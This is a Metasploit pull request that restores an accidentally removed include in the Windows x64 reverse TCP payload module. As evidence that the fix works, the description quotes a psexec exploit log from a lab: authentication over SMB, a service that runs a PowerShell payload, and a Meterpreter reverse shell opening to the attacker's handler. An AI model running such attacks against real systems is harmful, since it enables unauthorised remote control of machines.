### PR TITLE
Accidentally removed include that is sort of imperative....

### DIFF
--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -20,6 +20,7 @@ module Payload::Windows::ReverseTcp_x64
   include Msf::Payload::Windows
   include Msf::Payload::Windows::SendUUID_x64
   include Msf::Payload::Windows::BlockApi_x64
+  include Msf::Payload::Windows::Exitfunk_x64
 
   #
   # Register reverse_tcp specific options


### PR DESCRIPTION
During the final part of the pingback landing, I was clearing out includes from pingback that were unused, and I screwed up and removed an include from a non-pingback payload.....  Returning that include.

Before:
```
> run -z
[-] Exploit failed: undefined method `asm_exitfunk' for #<#<Class:0x00007f1824fa0fd0>:0x000000000863c0d8>
[*] Exploit completed, but no session was created.
```

You could also likely find the error using msf venom, but here is the corrected version:
```
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] 192.168.134.105:445 - Connecting to the server...
[*] 192.168.134.105:445 - Authenticating to 192.168.134.105:445 as user '[redacted]'...
[!] 192.168.134.105:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.105:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.105:445 - PowerShell found
[*] 192.168.134.105:445 - Selecting PowerShell target
[*] 192.168.134.105:445 - Powershell command length: 2652
[*] 192.168.134.105:445 - Executing the payload...
[*] 192.168.134.105:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.105[\svcctl] ...
[*] 192.168.134.105:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.105[\svcctl] ...
[*] 192.168.134.105:445 - Obtaining a service manager handle...
[*] 192.168.134.105:445 - Creating the service...
[+] 192.168.134.105:445 - Successfully created the service
[*] 192.168.134.105:445 - Starting the service...
[+] 192.168.134.105:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.105:445 - Removing the service...
[+] 192.168.134.105:445 - Successfully removed the service
[*] 192.168.134.105:445 - Closing service handle...
[*] Sending stage (206403 bytes) to 192.168.134.105
[*] Meterpreter session 3 opened (192.168.135.168:4567 -> 192.168.134.105:49159) at 2019-07-31 08:43:41 -0500

meterpreter > sysinfo
Computer        : WIN7X64SP1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > exit

```